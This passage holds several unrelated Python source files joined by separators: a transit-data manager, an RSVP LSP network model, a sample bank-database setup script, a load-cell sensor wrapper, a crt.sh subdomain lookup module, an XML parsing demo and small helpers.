        Speeds things up a little bit if skipped (OpenData only)
    link_stops : Link stops to routes. Required for heatmap but not for just
        plotting the routes. Speeds things up if skipped (OpenData only)
    """
    def __init__(self, dataset, link_route_shapes=False, link_stops=True):
        super(DataManagerOpen, self).__init__(dataset)
        # Only routes present in this filter dict are kept by read_file()
        self._include_route_dict = OPEN_DATA_ROUTE_FILTER.get(dataset)
        self._deprecated = {}
        self.read_file()
        self.read_file_stops()
        self._active_stops = []
        self._trips = TransitTrips(self._base_path)
        if link_route_shapes:
            self._shapes = TransitShapes(self._base_path)
            for route in self.get_routes():
                shape_ids = self._trips.get_shape_ids(route.get_id())
                for shape_id in shape_ids:
                    segment = self._shapes.get_polyline(shape_id)
                    route.add_segment(segment, segment_id=shape_id)
        # Must cross-link routes/stops before calling stop times
        # After dictionaries built, cross-link them
        for route in self._route_dict.itervalues():
            route.set_stop_dict(self._stop_dict)
        for stop in self._stop_dict.itervalues():
            stop.set_route_dict(self._route_dict)
        if link_stops:
            # StopTimes needs a back-reference to this manager
            self._stop_times = StopTimes(self._base_path, self)
    def _sanity_check_departures(self, stop_id, departures):
        """
        Look for departures on same route/stop but with different directions.
        RESULT: There do not appear to be any cases where there is a departure
        from a stop on the same route but with a different direction
        """
        print "SANITY START"
        d = {}
        for depart in departures:
            direction = depart.get(KEY.DIRECTION)
            route_id = depart.get(KEY.ROUTE_ID)
            depart_time = depart.get(KEY.DEPART_TIME)
            # One key per (route, departure time) pair
            key = "%d-%d" % (route_id, depart_time)
            have_direction = d.get(key)
            if have_direction is not None and have_direction != direction:
                stop = self.get_stop(stop_id)
                route = self.get_route(route_id)
                print "WARN_DUPLICATE: %d (%s) %d (%s) " % (stop_id, stop.get_name(), route_id, route.get_name())
            d[key] = direction
        print "SANITY DONE"
    def _get_time_minutes(self, time_str):
        """Convert "H" or "H:MM" into minutes past midnight.

        Raises ValueError for any other format.
        """
        parts = time_str.split(":")
        if len(parts) == 1:
            # This is just an hour specification
            result = 60 * int(parts[0])
        elif len(parts) == 2:
            result = 60 * int(parts[0]) + int(parts[1])
        else:
            raise ValueError("Invalid time string: %s" % repr(time_str))
        return result
    def _dump_data(self, departures):
        # Debug helper: print every departure then abort
        for depart in departures:
            print repr(depart)
        raise ValueError("ERROR")
    def get_departures(self, stop, service):
        """Return all departures from a stop for the given service day."""
        return self._stop_times.get_stop_departures(stop, service)
    def get_departs_per_hour(self, route, direction, stop, service, time_str):
        """Count departures in the one-hour window centered on time_str.

        Must consider each direction separately.
        """
        # Get target depart time (seconds past midnight)
        target_sec = 60.0 * self._get_time_minutes(time_str)
        # Get all departures from this stop (they are sorted)
        departures = self._stop_times.get_stop_departures(stop, service, direction=direction, route=route)
        # Half-hour window either side of the target time
        start_sec = target_sec - 30 * 60
        end_sec = target_sec + 30 * 60
        depart_count = 0
        for depart in departures:
            depart_sec = depart.get(KEY.DEPART_TIME)
            if depart_sec >= start_sec and depart_sec < end_sec:
                depart_count += 1
        return depart_count
    def get_departs_per_day(self, route, direction, stop, service):
        """Count all departures for a route/direction/stop on a service day."""
        # Get all departures from this stop (they are sorted)
        departures = self._stop_times.get_stop_departures(stop, service, direction=direction, route=route)
        return len(departures)
    def get_departs_per_week(self, route, direction, stop):
        """Sum departures across both directions for each service type.

        NOTE(review): the `direction` parameter is ignored (both 0 and 1 are
        summed), and the MWF service is counted once — confirm whether weekday
        totals should be multiplied by the number of weekdays.
        """
        result = self.get_departs_per_day(route, 0, stop, SERVICE.MWF)
        result += self.get_departs_per_day(route, 1, stop, SERVICE.MWF)
        result += self.get_departs_per_day(route, 0, stop, SERVICE.SAT)
        result += self.get_departs_per_day(route, 1, stop, SERVICE.SAT)
        result += self.get_departs_per_day(route, 0, stop, SERVICE.SUN)
        result += self.get_departs_per_day(route, 1, stop, SERVICE.SUN)
        return result
    # (An interval-based _get_departs_per_hour_internal_OLD implementation was
    # removed here; counting departures over a one-hour window proved simpler.)
    def get_active_stops(self):
        """Return stops that serve at least one route (computed lazily)."""
        if not self._active_stops:
            stops = self.get_stops()
            for stop in stops:
                routes_ids = stop.get_route_ids()
                if len(routes_ids) > 0:
                    self._active_stops.append(stop)
        return self._active_stops
    def get_route_from_trip_id(self, trip_id):
        """Return the TransitRoute that the given trip belongs to."""
        route_id = self._trips.get_route_id(trip_id)
        return self.get_route(route_id)
    def get_trip_service_type(self, trip_id):
        return self._trips.get_service_type(trip_id)
    def get_trip_headsign(self, trip_id):
        return self._trips.get_headsign(trip_id)
    def get_trip_direction(self, trip_id):
        return self._trips.get_direction(trip_id)
    def read_file_stops(self):
        """Load stops from my-TransitStops.csv into self._stop_dict.

        CSV columns:
        0 stop_id,
        1 stop_code,
        2 stop_lat,
        3 stop_lon,
        4 location_type,
        5 wheelchair_boarding,
        6 name
        """
        file_name = os.path.join(self._base_path, "my-TransitStops.csv")
        result = {}
        line_count = 0
        f = None
        # Fallback ids for rows whose stop_id cannot be parsed as an int
        fake_stop_id = 10000
        print "Reading file %s..." % file_name
        try:
            f = open(file_name, 'r')
            for line in f:
                line_count += 1
                # Skip the CSV header row
                if line_count == 1: continue
                line = line.strip()
                parts = line.split(",")
                bad_id = None
                try:
                    item = parts[0].strip()
                    # Ids like "1234_merged" keep only the numeric prefix
                    pos = item.find("_merged")
                    if pos > 0:
                        fixed = item[:pos]
                        print "Fixed :%s -> %s" % (item, fixed)
                        item = fixed
                    stop_id = int(item)
                except Exception as err:
                    print "Exception processing line: %s" % repr(err), item
                    print "Line: %s" % line
                    stop_id = fake_stop_id
                    print "Assign fake stop ID: %d" % fake_stop_id
                    fake_stop_id += 1
                    bad_id = item
                name = parts[6].strip()
                lat = float(parts[2].strip())
                lng = float(parts[3].strip())
                stop = TransitStop(stop_id, name, Point(lat, lng))
                if bad_id:
                    # Remember the unparseable original id for traceability
                    stop.set_attribute(KEY.BAD_ID, bad_id)
                result[stop_id] = stop
        finally:
            if f: f.close()
        self._stop_dict = result
        print "Read %d stops" % len(self._stop_dict)
    def read_file(self):
        """Load routes from my-TransitRoutes.csv into self._route_dict.

        CSV columns:
        0 route_id,
        1 route_type,
        2 route_color,
        3 text_color,
        4 name_short,
        5 name_long

        Routes absent from the include filter are recorded in
        self._deprecated instead.
        """
        file_name = os.path.join(self._base_path, "my-TransitRoutes.csv")
        line_count = 0
        f = None
        try:
            f = open(file_name, 'r')
            for line in f:
                line_count += 1
                # Skip the CSV header row
                if line_count == 1: continue
                line = line.strip()
                parts = line.split(",")
                route_id = int(parts[0].strip())
                route_number = int(parts[4].strip())
                long_name = parts[5].strip()
                # I am not sure what the route type is; 3 is the only value seen
                route_type = int(parts[1].strip())
                if route_type != 3:
                    raise ValueError("route type not 3")
                print "read route ID", route_id
                if not self._include_route_dict.has_key(route_id):
                    print "SKIPPING ROUTE", route_id
                    self._deprecated[route_id] = (route_number, long_name)
                    continue
                if self._route_dict.has_key(route_id):
                    raise ValueError("THIS IS A DUP!!!")
                route = TransitRoute(route_id, route_number, long_name)
                self._route_dict[route_id] = route
            print "number of routes:", len(self._route_dict)
        finally:
            if f:
                f.close()
        # ----- TEST -----
        # Print all loaded routes sorted by name (debug output only)
        s = []
        for route_id, route in self._route_dict.iteritems():
            name = route.get_name()
            s.append((name, route_id))
        s = sorted(s)
        for i, item in enumerate(s):
            print "%d ID: %s NAME: %s" % (i+1, item[1], item[0])
        # ---- END TEST -----
    def get_segments(self, route_id):
        """
        Unfortunately the pre-BRT data routes are described in not one but several polylines.
        These MUST be plotted independently otherwise we get lots of spurious lines on the plot

        NOTE(review): this reads self._transit_trips / self._transit_shapes,
        which are not assigned in __init__ here (it uses self._trips /
        self._shapes) — confirm the base class initializes them to None.
        :param route_id:
        :return:
        """
        # Allocate on demand
        if self._transit_trips is None:
            self._transit_trips = TransitTrips(self._base_path)
        # Allocate on demand
        if self._transit_shapes is None:
            self._transit_shapes = TransitShapes(self._base_path)
        result = []
        shape_ids = self._transit_trips.get_shape_ids(route_id)
        for shape_id in shape_ids:
            polyline = self._transit_shapes.get_polyline(shape_id)
            result.append(polyline)
        return result
    def get_route_ids(self):
        """Return all known route ids."""
        result = [k for k in self._route_dict.iterkeys()]
        return result
    def get_routes(self):
        """Return all known TransitRoute objects."""
        return [route for route in self._route_dict.itervalues()]
|
def f(x: int):
    """Return the integer argument unchanged (identity helper)."""
    value = x
    return value
def g(y: str):
    """Return the string argument unchanged (identity helper)."""
    text = y
    return text
# Exercise the helpers: f returns its argument unchanged.
x = f(4)
# NOTE(review): g is annotated to take a str but receives an int here;
# annotations are not enforced at runtime so this still runs — confirm
# whether g(str(x)) was intended.
g(x)
|
"""A class to represent an RSVP label-switched-path in the network model """
import random
from .exceptions import ModelException
class RSVP_LSP(object):
    """A class to represent an RSVP label-switched-path in the network model

    source_node_object: Node where LSP ingresses the network (LSP starts here)
    dest_node_object: Node where LSP egresses the network (LSP ends here)
    lsp_name: name of LSP
    path: will either be 'Unrouted' or be a dict containing the following -
        - interfaces: list of interfaces that LSP egresses in the order it
          egresses them
        - path_cost: sum of costs of the interfaces
        - baseline_path_reservable_bw: the amount of reservable bandwidth
          available on the LSP's path when the LSP was signaled, not inclusive
          of the bandwidth already reserved by this LSP on that path (if any)
    reserved_bandwidth: amount of bandwidth reserved by this LSP
    setup_bandwidth: amount of bandwidth this LSP wants to signal for
    """
    def __init__(self, source_node_object, dest_node_object,
                 lsp_name='none', configured_setup_bandwidth=None):
        self.source_node_object = source_node_object
        self.dest_node_object = dest_node_object
        self.lsp_name = lsp_name
        # Sentinel strings mark an LSP that has never been routed; routing
        # replaces these with a path dict or plain 'Unrouted'
        self.path = 'Unrouted - initial'
        self.reserved_bandwidth = 'Unrouted - initial'
        self._setup_bandwidth = 'Unrouted - initial'
        self.configured_setup_bandwidth = configured_setup_bandwidth
    @property
    def _key(self):
        """Unique identifier for the rsvp lsp: (Node('source').name, Node('dest').name, name)"""
        return (self.source_node_object.name, self.dest_node_object.name, self.lsp_name)
    def __repr__(self):
        return 'RSVP_LSP(source = %s, dest = %s, lsp_name = %r)' % \
            (self.source_node_object.name,
             self.dest_node_object.name,
             self.lsp_name)
    def _find_path_cost_and_headroom_routed_lsp(self, candidate_paths):
        """
        Returns a list of dictionaries containing the path interfaces as
        well as the path cost and headroom available on the path. This def
        takes into account that self is a routed LSP and is looking to
        signal for additional bandwidth. As such, this def adds back its
        existing reserved_bandwidth to any Interface in a path in
        candidate_paths that it is already signaled on.

        :param candidate_paths: list of lists of Interface objects
        :return: list of dictionaries of paths: {'interfaces': path,
                 'path_cost': path_cost,
                 'baseline_path_reservable_bw': baseline_path_reservable_bw}
        """
        # List to hold info on each candidate path
        candidate_path_info = []
        # Find the path cost and path headroom for each path candidate
        for path in candidate_paths['path']:
            path_cost = 0
            for interface in path:
                path_cost += interface.cost
            # Find the path cost and reservable bandwidth on each path.
            # If the path you are examining has an interface that is on
            # the LSP's current path, add back in the
            # reserved bandwidth for the LSP to that interface
            proto_reservable_bw = {}
            for interface in path:
                if interface in self.path['interfaces']:
                    proto_reservable_bw[interface] = interface.reservable_bandwidth + self.reserved_bandwidth
                else:
                    proto_reservable_bw[interface] = interface.reservable_bandwidth
            # baseline_path_reservable_bw is the max amount of traffic
            # that the path can handle without using more than a component
            # interface's reservable_bandwidth
            baseline_path_reservable_bw = min(proto_reservable_bw.values())
            path_info = {'interfaces': path, 'path_cost': path_cost,
                         'baseline_path_reservable_bw': baseline_path_reservable_bw}
            candidate_path_info.append(path_info)
        return candidate_path_info
    @property
    def setup_bandwidth(self):
        """
        The bandwidth the LSP attempts to signal for.

        :return: the bandwidth the LSP attempts to signal for
        """
        return self._setup_bandwidth
    @setup_bandwidth.setter
    def setup_bandwidth(self, proposed_setup_bw):
        """
        Puts guardrails on the setup bandwidth for the RSVP LSP

        :param proposed_setup_bw: setup bandwidth value to be evaluated
        :return:
        """
        # A configured_setup_bandwidth always wins over the proposed value
        if self.configured_setup_bandwidth:
            self._setup_bandwidth = float(self.configured_setup_bandwidth)
        elif proposed_setup_bw >= 0:
            self._setup_bandwidth = float(proposed_setup_bw)
        elif proposed_setup_bw < 0:
            msg = "setup_bandwidth must be 0 or greater"
            raise ModelException(msg)
    def find_rsvp_path_w_bw(self, requested_bandwidth, model):
        """
        Will search the topology of 'model' for a path for self that has at least
        'requested_bandwidth' of reservable_bandwidth. If there is one, will update
        self.path; if not, will keep same self.path. When checking paths,
        this def will take into account its own reserved bandwidth if it
        is looking at paths that have interfaces already in its
        path['interfaces'] list.

        :param model: Model object to search; this will typically be a Model
            object consisting of only non-failed interfaces
        :param requested_bandwidth: number of units set for reserved_bandwidth
        :return: self with the current or updated path info
        """
        # Get candidate paths; only include interfaces that have requested_bandwidth
        # of reservable_bandwidth
        candidate_paths = model.get_shortest_path_for_routed_lsp(self.source_node_object.name,
                                                                 self.dest_node_object.name,
                                                                 self, requested_bandwidth)
        # Find the path cost and path headroom for each path candidate
        candidate_path_info = self._find_path_cost_and_headroom_routed_lsp(candidate_paths)
        # If there are no paths with enough headroom, keep the current path
        if len(candidate_path_info) == 0:
            return self
        # If there is only one path with enough headroom, make that self.path
        elif len(candidate_path_info) == 1:
            self.path = candidate_path_info[0]
        # If there is more than one path with enough headroom,
        # choose one at random and make that self.path
        elif len(candidate_path_info) > 1:
            self.path = random.choice(candidate_path_info)
        self.reserved_bandwidth = requested_bandwidth
        self.setup_bandwidth = requested_bandwidth
        return self
    def _add_rsvp_lsp_path(self, model):
        """
        Determines the LSP's path regardless of whether it was previously routed
        or not (non stateful).

        If this LSP is currently routed and takes on additional traffic
        and there is not a path that can handle the additional traffic,
        this LSP will not signal.

        :param model: Model object that the LSP is in
        :return: self with 'path' attribute
        """
        # Try all shortest paths with needed reservable bandwidth
        candidate_paths = model.get_shortest_path(self.source_node_object.name,
                                                  self.dest_node_object.name, self.setup_bandwidth)
        # Route LSP
        # Options:
        # a. There are no viable paths on the topology to route LSP - LSP will be unrouted
        # b. LSP can route with current setup_bandwidth
        # Option a. There are no viable paths on the topology to route LSP - LSP will be unrouted
        if candidate_paths['path'] == []:
            # If there are no possible paths, then LSP is Unrouted
            self.path = 'Unrouted'
            self.reserved_bandwidth = 'Unrouted'
            return self
        self.path = {}
        # Find the path cost and path headroom for each path candidate
        candidate_path_info = self._find_path_cost_and_headroom(candidate_paths)
        # Option b. LSP can route with current setup_bandwidth
        # If multiple lowest_metric_paths, find those with fewest hops
        if len(candidate_path_info) > 1:
            fewest_hops = min([len(path['interfaces']) for path in candidate_path_info])
            lowest_hop_count_paths = [path for path in candidate_path_info if len(path['interfaces']) == fewest_hops]
            if len(lowest_hop_count_paths) > 1:
                # Tie-break between equal-hop paths at random
                new_path = random.choice(lowest_hop_count_paths)
            else:
                new_path = lowest_hop_count_paths[0]
        else:
            new_path = candidate_path_info[0]
        self.path = new_path
        # Since there is enough headroom, set LSP
        # reserved_bandwidth to setup_bandwidth
        self.reserved_bandwidth = self.setup_bandwidth
        # Update the reserved_bandwidth on each interface on the new path
        for interface in self.path['interfaces']:
            # Make LSP reserved_bandwidth = setup_bandwidth because it is able to
            # signal for the entire amount
            interface.reserved_bandwidth += self.reserved_bandwidth
        return self
    def _find_path_cost_and_headroom(self, candidate_paths):
        """
        Returns a list of dictionaries containing the path interfaces as
        well as the path cost and headroom available on the path.

        :param candidate_paths: list of lists of Interface objects
        :return: list of dictionaries of paths: {'interfaces': path,
                 'path_cost': path_cost,
                 'baseline_path_reservable_bw': baseline_path_reservable_bw}
        """
        # List to hold info on each candidate path
        candidate_path_info = []
        # Find the path cost and path headroom for each path candidate
        for path in candidate_paths['path']:
            path_cost = 0
            for interface in path:
                path_cost += interface.cost
            # baseline_path_reservable_bw is the max amount of traffic that the path
            # can handle without saturating a component interface
            baseline_path_reservable_bw = min([interface.reservable_bandwidth for interface in path])
            path_info = {'interfaces': path, 'path_cost': path_cost,
                         'baseline_path_reservable_bw': baseline_path_reservable_bw}
            candidate_path_info.append(path_info)
        return candidate_path_info
    def demands_on_lsp(self, model):
        """Returns demands that LSP is transporting."""
        demand_list = []
        for demand in (demand for demand in model.demand_objects):
            if self in demand.path:
                demand_list.append(demand)
        return demand_list
    def traffic_on_lsp(self, model):
        """
        Returns the amount of traffic on the LSP

        Traffic is split evenly among the routed LSPs that share this LSP's
        source and destination.

        NOTE(review): raises ZeroDivisionError if no LSP in the parallel
        group is routed — confirm callers only invoke this on routed LSPs.

        :param model: Model object for LSP
        :return: Units of traffic on the LSP
        """
        # Find all LSPs with same source and dest as self
        parallel_lsp_groups = model.parallel_lsp_groups()
        total_traffic = sum([demand.traffic for demand in self.demands_on_lsp(model)])
        key = "{}-{}".format(self.source_node_object.name, self.dest_node_object.name)
        parallel_routed_lsps = [lsp for lsp in parallel_lsp_groups[key] if 'Unrouted' not in lsp.path]
        traffic_on_lsp = total_traffic / len(parallel_routed_lsps)
        return traffic_on_lsp
    def effective_metric(self, model):
        """Returns the metric for the best path. This value will be the
        shortest possible path from LSP's source to dest, regardless of
        whether the LSP takes that shortest path or not."""
        return model.get_shortest_path(self.source_node_object.name,
                                       self.dest_node_object.name, needed_bw=0)['cost']
    def actual_metric(self, model):
        """Returns the metric sum of the interfaces that the LSP actually
        transits."""
        # When self.path is a dict, 'Unrouted' is never among its keys, so
        # this containment test covers both the string and dict cases
        if 'Unrouted' in self.path:
            metric = 'Unrouted'
        else:
            metric = sum([interface.cost for interface in self.path['interfaces']])
        return metric
    def route_lsp(self, model, setup_bandwidth):
        """
        Used in Model object to route each LSP

        :param model: Model object containing this LSP
        :param setup_bandwidth: bandwidth the LSP should try to signal for
        :return: self, with updated path state
        """
        # Calculate setup bandwidth
        self.setup_bandwidth = setup_bandwidth
        # Route the LSP
        self._add_rsvp_lsp_path(model)
        return self
|
from pegasos import *
from sgdqn import *
from asgd import *
from olbfgs import * |
# *** Bank Database Management System ***
# A simple terminal application coded in python is used as frontend.
# Oracle’s MySQL is used as the backend database system
# Import pymysql package to provide a simple interface to MySQL Database.
import pymysql
# Take the credentials to MySQL as user input
username = input("Input the username for the MySQL database: ")
password = input("Input the password for the MySQL database: ")
try:
    connection = pymysql.connect(host='localhost',
                                 user=username,
                                 password=password,
                                 charset='utf8mb4',
                                 cursorclass=pymysql.cursors.DictCursor)
    print("Connection Successful!!!")
except pymysql.err.OperationalError as e:
    print('Error: %d: %s' % (e.args[0], e.args[1]))
    # BUG FIX: the original fell through after a failed connection and later
    # used the undefined `connection`, crashing with a NameError. Abort
    # cleanly instead.
    raise SystemExit(1)
# Create the database called Bank Database System
cursor = connection.cursor()
query = 'CREATE DATABASE IF NOT EXISTS `BankDatabaseSystem`'
cursor.execute(query)
print("Database created successfully")
# The bootstrap connection is no longer needed once the database exists
connection.close()
# Connect to the created Database
database = pymysql.connect(host='localhost',
                           user=username,
                           password=password,
                           charset='utf8mb4',
                           db='BankDatabaseSystem',
                           cursorclass=pymysql.cursors.DictCursor)
try:
    cursor = database.cursor()
    # Create table Bank Branch
    cursor.execute(
        """CREATE TABLE IF NOT EXISTS `Branch`
        (
        `id` INT PRIMARY KEY AUTO_INCREMENT,
        `name` VARCHAR(50) NOT NULL,
        `phone` VARCHAR(20) NOT NULL,
        `city` VARCHAR(50) NOT NULL,
        `state` CHAR(2) NOT NULL,
        `zip` VARCHAR(20) NOT NULL
        )""")
    # Create table Customer
    cursor.execute(
        """CREATE TABLE IF NOT EXISTS `Customer`
        (
        `id` INT PRIMARY KEY AUTO_INCREMENT,
        `first_name` VARCHAR(50) NOT NULL,
        `last_name` VARCHAR(50) NOT NULL,
        `phone` VARCHAR(20) NOT NULL,
        `city` VARCHAR(50) NOT NULL,
        `state` CHAR(2) NOT NULL,
        `zip` VARCHAR(20) NOT NULL
        )""")
    # Create table Account (each account belongs to a customer and a branch)
    cursor.execute(
        """CREATE TABLE IF NOT EXISTS `Account`
        (
        `id` INT PRIMARY KEY AUTO_INCREMENT,
        `acc_number` VARCHAR(20) NOT NULL,
        `acc_type` VARCHAR(20) NOT NULL,
        `balance` DOUBLE DEFAULT 0.0,
        `branch_id` INT NOT NULL,
        `owner_id` INT NOT NULL,
        FOREIGN KEY(`owner_id`) REFERENCES `customer`(`id`) ON UPDATE CASCADE ON DELETE CASCADE,
        FOREIGN KEY(`branch_id`) REFERENCES `Branch`(`id`) ON UPDATE CASCADE ON DELETE CASCADE
        )""")
    # Create Table Loan
    cursor.execute(
        """CREATE TABLE IF NOT EXISTS `Loan`
        (
        `id` INT PRIMARY KEY AUTO_INCREMENT,
        `customer_id` INT NOT NULL,
        `account_id` INT NOT NULL,
        `amount` INT DEFAULT 0,
        `interest` DOUBLE NOT NULL DEFAULT 0.0,
        `years` INT NOT NULL DEFAULT 2,
        FOREIGN KEY(`customer_id`) REFERENCES `Customer`(`id`) ON UPDATE CASCADE ON DELETE CASCADE,
        FOREIGN KEY(`account_id`) REFERENCES `Account`(`id`) ON UPDATE CASCADE ON DELETE CASCADE
        )""")
    # Create Table Transaction
    cursor.execute(
        """CREATE TABLE IF NOT EXISTS `Transaction`
        (
        `id` INT PRIMARY KEY AUTO_INCREMENT,
        `customer_id` INT NOT NULL,
        `account_id` INT NOT NULL,
        `amount` INT DEFAULT 0,
        `description` VARCHAR(255) NOT NULL DEFAULT "",
        FOREIGN KEY(`customer_id`) REFERENCES `Customer`(`id`) ON UPDATE CASCADE ON DELETE CASCADE,
        FOREIGN KEY(`account_id`) REFERENCES `Account`(`id`) ON UPDATE CASCADE ON DELETE CASCADE
        )""")
    # Create Table Claim
    cursor.execute(
        """CREATE TABLE IF NOT EXISTS `Claim`
        (
        `id` INT PRIMARY KEY AUTO_INCREMENT,
        `account_id` INT NOT NULL,
        `owner_id` INT NOT NULL,
        `description` VARCHAR(255) NOT NULL DEFAULT "",
        `date` DATETIME NOT NULL,
        FOREIGN KEY(`account_id`) REFERENCES `Account`(`id`) ON UPDATE CASCADE ON DELETE CASCADE,
        FOREIGN KEY(`owner_id`) REFERENCES `Customer`(`id`) ON UPDATE CASCADE ON DELETE CASCADE
        )""")
    print("All tables are created successfully in the Bank Database System")
    # Now, we need to insert some sample data for demonstration purposes
    cursor.execute(
        "INSERT INTO `Branch` (name, phone, city, state, zip) VALUES ('Grafton', '9784439888', 'Cambridge', 'MA', '02341')")
    cursor.execute(
        "INSERT INTO `Branch` (name, phone, city, state, zip) VALUES ('Maple', '6264439888', 'Stockton', 'CA', '95219')")
    cursor.execute(
        "INSERT INTO `Branch` (name, phone, city, state, zip) VALUES ('Valley', '8062797843', 'Austin', 'TX', '79065')")
    cursor.execute(
        "INSERT INTO `customer` (first_name, last_name, phone, city, state, zip) VALUES ('Lisa', 'White', '9788477697', 'Cambridge', 'MA', '02341' )")
    cursor.execute(
        "INSERT INTO `customer` (first_name, last_name, phone, city, state, zip) VALUES ('Sarah', 'Walling', '4132555381', 'Springfield', 'MA', '01103' )")
    cursor.execute(
        "INSERT INTO `customer` (first_name, last_name, phone, city, state, zip) VALUES ('Ronald', 'Lutz', '2093049067', 'Stockton', 'CA', '95201' )")
    cursor.execute(
        "INSERT INTO `customer` (first_name, last_name, phone, city, state, zip) VALUES ('Kristin', 'Cook', '2096628424', 'Stockton', 'CA', '95217' )")
    cursor.execute(
        "INSERT INTO `customer` (first_name, last_name, phone, city, state, zip) VALUES ('Barbara', 'Baker', '5126085577', 'Austin', 'TX', '78746' )")
    cursor.execute(
        "INSERT INTO `account` (acc_number, acc_type, balance, branch_id, owner_id) VALUES ('2345-8756-9876-5432', 'Savings', 250000.2, 1, 1)")
    cursor.execute(
        "INSERT INTO `account` (acc_number, acc_type, balance, branch_id, owner_id) VALUES ('2345-8756-9876-5498', 'Savings', 32693.3, 1, 2)")
    cursor.execute(
        "INSERT INTO `account` (acc_number, acc_type, balance, branch_id, owner_id) VALUES ('9867-4520-0956-1764', 'Savings', 290000.7, 2, 3)")
    print("Sample Data inserted successfully")
    # Commit once after all DDL/DML so the sample data persists
    database.commit()
except pymysql.Error as err:
    print('Error: %d: %s' % (err.args[0], err.args[1]))
finally:
    # Always release the connection, even if table creation failed
    database.close()
|
class Weighable():
    """Wraps one channel ('A' or 'B') of an already-configured Sensor().

    ``weight_data`` maps a size name to a ``(tare_wt, net_wt)`` pair.
    Subclasses are expected to supply it before delegating here:

        def __init__(self, ...):
            self.weight_data = utils.foo_data
            super().__init__(...)

    Bug fix: ``set_size`` previously rejected a custom size whose tare or
    net weight was 0 (falsy); it now only rejects ``None``.
    """
    def __init__(
        self,
        sensor,
        channel,
        name,
        weight_data,
        location = None,
        size = None,
        tare_wt = None,
        net_wt = None
    ):
        self.sensor = sensor  # a Sensor() instance, already set up
        self.set_channel(channel)
        self.set_name(name)
        self.set_location(location)
        # must be assigned before set_size(), which reads it
        self.weight_data = weight_data
        self.set_size(size, tare_wt=tare_wt, net_wt=net_wt)

    def get_weight(self):
        """Current weight reading from the sensor's channel."""
        return self.sensor.get_weight(self.channel)

    def tare(self):
        """Zero the scale on this channel."""
        self.sensor.tare_channel(self.channel)

    def calibrate(self, cal_weight):
        """Calibrate this channel against a known reference weight."""
        self.sensor.calibrate_channel(self.channel, cal_weight)

    def get_name(self):
        return self.name

    def set_name(self, name):
        self.name = name

    def get_location(self):
        return self.location

    def set_location(self, location):
        self.location = location

    def get_size(self):
        """Return (size, tare_wt, net_wt)."""
        return (self.size, self.tare_wt, self.net_wt)

    def set_size(self, size, tare_wt=None, net_wt=None):
        """Select a named size from weight_data, or a 'custom' size.

        If ``size`` is a key in ``weight_data``, its (tare_wt, net_wt)
        pair is used.  Otherwise the size becomes 'custom' and both
        ``tare_wt`` and ``net_wt`` must be given explicitly (0 is valid).

        Raises ValueError when a custom size is missing either weight.
        """
        try:
            self.size = size
            self.tare_wt, self.net_wt = self.weight_data[size]
        except KeyError:  # size key not found in weight_data
            self.size = 'custom'
            # `is None` (not truthiness): a tare or net weight of 0 is legal
            if tare_wt is None or net_wt is None:
                raise ValueError(f"non-standard size {size} requires tare_wt and net_wt, found instead {tare_wt} and {net_wt}")
            self.tare_wt = tare_wt
            self.net_wt = net_wt

    def get_channel(self):
        return self.channel

    def set_channel(self, channel):
        """Set the sensor channel; only 'A' and 'B' exist."""
        if channel in ('A', 'B'):
            self.channel = channel
        else:
            raise ValueError("no such channel %s" % channel)
|
import time
from crtsh import crtshAPI
from simplydomain.src import core_serialization
from simplydomain.src import module_helpers
from simplydomain.src import core_scrub
class DynamicModule(object):
    """
    Dynamic module class that will be loaded and called
    at runtime. This will allow modules to easily be independent of the
    core runtime.
    """

    def __init__(self, json_entry):
        """
        Init class structure. Each module takes a JSON entry object which
        can pass different values to the module with out changing up the API.
        adapted form Empire Project:
        https://github.com/EmpireProject/Empire/blob/master/lib/modules/python_template.py

        :param json_entry: JSON data object passed to the module.
        """
        self.json_entry = json_entry
        self.info = {
            # mod name
            'Module': 'crtsh_search.py',
            # long name of the module to be used
            'Name': 'Comodo Certificate Fingerprint',
            # version of the module to be used
            'Version': '1.0',
            # description
            'Description': ['Uses https://crt.sh search',
                            'with unofficial search engine support.'],
            # authors or sources to be quoted
            'Authors': ['@Killswitch-GUI', '@PaulSec'],
            # list of resources or comments
            'comments': [
                'SHA-1 or SHA-256 lookup.'
            ]
        }
        self.options = {
            # threads for the module to use
            'Threads': 1
        }

    def dynamic_main(self, queue_dict):
        """
        Main entry point for process to call.

        Queries crt.sh for the target domain and pushes one
        core_serialization.SubDomain result object per certificate entry
        onto the shared task_output_queue.

        core_serialization.SubDomain Attributes:
            name: long name of method
            module_name: name of the module that performed collection
            source: source of the subdomain or resource of collection
            module_version: version from meta
            source: source of the collection
            time: time the result obj was built
            subdomain: subdomain to use
            valid: is domain valid

        :param queue_dict: dict of shared queues; only 'task_output_queue'
            is used here.
        :return: None (results are communicated via the queue)
        """
        core_args = self.json_entry['args']
        task_output_queue = queue_dict['task_output_queue']
        cs = core_scrub.Scrub()
        # (removed an unused `rd = []` accumulator from the original)
        data = crtshAPI().search(str(core_args.DOMAIN))
        for d in data:
            # NOTE(review): this uses the certificate *issuer* field as the
            # subdomain; crt.sh usually reports the matched identity in
            # 'name_value' — confirm the intended field.
            cs.subdomain = d['issuer']
            # check if domain name is valid
            valid = cs.validate_domain()
            # build the SubDomain Object to pass
            sub_obj = core_serialization.SubDomain(
                self.info["Name"],
                self.info["Module"],
                "https://crt.sh",
                self.info["Version"],
                time.time(),
                d['issuer'],
                valid
            )
            # populate queue with return data objects
            task_output_queue.put(sub_obj)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2019/9/30 14:59
# @Author  : Jason
# @File    : test_xmltree2.py
# ElementTree demo: read country_data.xml, list neighbours and ranks,
# then increment every rank and write the tree back out as output.xml.
import xml.etree.ElementTree as ET

tree = ET.parse('country_data.xml')
root = tree.getroot()
print(root)

# Attribute dict of every <neighbor> element anywhere in the document.
for nb in root.iter('neighbor'):
    print(nb.attrib)
print('')

# Each country's name attribute alongside its <rank> text.
for node in root.findall('country'):
    print(node.get('name'), node.find('rank').text)

# Bump every rank by one and mark the element as updated.
for rk in root.iter('rank'):
    rk.text = str(int(rk.text) + 1)
    rk.set('updated', 'yes')
tree.write('output.xml')
#!/usr/bin/python3
'''write and append a text in a file module'''


def append_write(filename="", text=""):
    """Append ``text`` to the UTF-8 text file ``filename``.

    The file is created if it does not exist.

    Returns the number of characters written (as reported by write()).
    """
    # (fix: the original stored write()'s result in a misspelled local
    # `lenght`; returning it directly is clearer)
    with open(filename, mode="a", encoding="utf-8") as f:
        return f.write(text)
|
# Generated by Django 2.2.1 on 2019-05-19 00:06
# Auto-generated migration: adds help_text to two DateTimeFields on Post.
# Migration files should not be hand-edited beyond comments.
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
